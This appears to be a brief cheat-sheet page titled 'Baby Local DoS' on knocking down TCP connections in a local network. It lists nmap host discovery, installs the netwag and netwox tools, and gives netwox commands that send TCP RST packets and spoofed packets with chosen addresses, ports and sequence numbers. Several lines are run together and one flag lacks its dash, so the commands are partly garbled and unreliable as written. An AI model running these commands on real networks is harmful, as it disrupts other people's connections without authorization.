Baby Local DoS
Send RST on TCP connections in local network.
sudo nmap -sn 192.168.1.0/24
# or with ettercap/bettercapsudo apt install netwag
sudo apt install netwag-doc
sudo apt install netwoxnetwox 78 -d eth0 -f 'src host <IP>'netwox 40 -l <src_IP> -m <dst_IP> -o <src_PORT> p <dst_PORT> -B -q <SeqNumber>Last updated